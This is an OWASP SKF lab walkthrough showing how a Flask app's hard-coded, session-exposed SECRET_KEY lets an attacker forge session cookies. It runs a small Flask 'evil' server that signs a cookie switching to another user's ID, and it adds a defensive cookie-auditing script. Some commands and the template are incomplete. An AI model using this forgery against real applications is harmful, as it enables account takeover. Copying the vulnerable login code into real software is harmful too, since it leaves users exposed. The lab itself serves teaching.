Python - Auth Bypass

Running the app on Docker

$ sudo docker pull blabla1337/owasp-skf-lab:auth-bypass
$ sudo docker run -ti -p blabla1337/owasp-skf-lab:auth-bypass

Now that the app is running, let's go hacking!

Let's log in with admin/admin:

Once we log in, we see an API key.

Let's have a look at the source code:

# hard-coded signing key for the session cookie
app.config.update(
    SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",
)

@app.route("/login", methods=['GET', 'POST'])
def login():
    sqli = Classes()
    if request.method == "POST":
        values = sqli.getUser(request.form['username'])
        if values:
            # plaintext password comparison; on success the signing key itself is copied into the session
            if values[0][2] == request.form['password']:
                session['userId'] = values[0][0]
                session['secret'] = app.config['SECRET_KEY']
                session['loggedin'] = True
                pref = sqli.getApi(values[0][0])
                api = pref[0][0]
                return render_template("loggedin.html", api = api)
        return render_template("index.html")
    # GET with an existing session: the user is trusted purely from the signed cookie
    # (the condition on this branch is not shown in the excerpt above; reconstructed here)
    if session.get('loggedin'):
        pref = sqli.getApi(session['userId'])
        api = pref[0][0]
        return render_template("loggedin.html", api = api)
    return render_template("index.html")

We can see that the secret used to sign the session cookie is exposed: it is hard-coded in the source and is even copied into the session itself. Knowing it, we can recreate this application's cookie implementation and forge a session cookie of our own to bypass the authentication.
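
Before forging anything, it helps to see why the exposed key matters: a Flask session cookie is signed, not encrypted, so its contents (including the `secret` this app copies into the session) are readable by anyone who holds the cookie, without the key. The script below is an added example (not part of the lab or of Flask); it parses the itsdangerous cookie layout with the standard library only, ignores the signature, and flags session keys that should never be stored client-side. The `build_sample_cookie` helper and the `SENSITIVE_KEYS` list are constructed for this demo, and the helper writes a placeholder instead of a real HMAC signature.

```python
import base64
import json
import zlib
from typing import Any

# Keys that should never live in a client-readable session (constructed list).
SENSITIVE_KEYS = {"secret", "secret_key", "password", "api_key", "token"}


def _b64decode(data: str) -> bytes:
    # itsdangerous strips base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def _b64encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_session_payload(cookie: str) -> dict[str, Any]:
    """Read the session dict out of a Flask-style cookie without SECRET_KEY.

    Layout: <payload>.<timestamp>.<signature>; a leading '.' marks a
    zlib-compressed payload. The signature is ignored on purpose: this
    inspects content, it does not verify authenticity.
    """
    compressed = cookie.startswith(".")
    body = cookie[1:] if compressed else cookie
    raw = _b64decode(body.split(".", 1)[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def find_sensitive_keys(session_data: dict[str, Any]) -> list[str]:
    """Session keys that hand a secret to anyone holding the cookie."""
    return sorted(k for k in session_data if k.lower() in SENSITIVE_KEYS)


def build_sample_cookie(session_data: dict[str, Any], compress: bool = False) -> str:
    """Same layout, but with a PLACEHOLDER signature (constructed for this
    example; a real cookie carries an HMAC keyed from SECRET_KEY)."""
    raw = json.dumps(session_data, separators=(",", ":")).encode()
    if compress:
        return "." + _b64encode(zlib.compress(raw)) + ".TIMESTAMP.PLACEHOLDER_SIG"
    return _b64encode(raw) + ".TIMESTAMP.PLACEHOLDER_SIG"


if __name__ == "__main__":
    # What the lab's login() puts in the session (values constructed here).
    data = {"loggedin": True, "secret": "e5ac-4ebf-03e5-9e29-a3f562e10b22", "userId": 1}
    print(find_sensitive_keys(decode_session_payload(build_sample_cookie(data))))
```

Running this against a cookie captured from your own application is a quick audit: anything the function flags is visible to the client and, for a signing key, lets the client mint its own sessions. The fix is to generate SECRET_KEY randomly, load it from the environment rather than source, and never place it in the session.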

We can now start building our malicious server.

from flask import Flask, request, url_for, render_template, redirect, make_response, session

app = Flask(__name__, static_url_path='/static', static_folder='static')

# same signing key as the target application, taken from its source
app.config.update(
    SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",
)

app.config['DEBUG'] = True

@app.route("/")  # route path not shown in the excerpt; "/" assumed here
def start():
    session['userId'] = 2 # CHANGING USER ID
    session['secret'] = app.config['SECRET_KEY']
    session['loggedin'] = True
    return render_template("evil.html")

if __name__ == "__main__":
    app.run(port=1337)  # the host argument is missing from the excerpt; Flask defaults to localhost

Save the snippet above to a Python file and run the command below to install the dependency. Of course, you can also run your app on whatever service you want; it does not have to be Python Flask.

$ pip3 install flask

Save the following template into /templates/evil.html:

<p>The newly created cookie for doing the bypass:</p>

We are ready to start our server:

$ python3

Now we can replace our original cookie with the tampered cookie.

Send the request again:
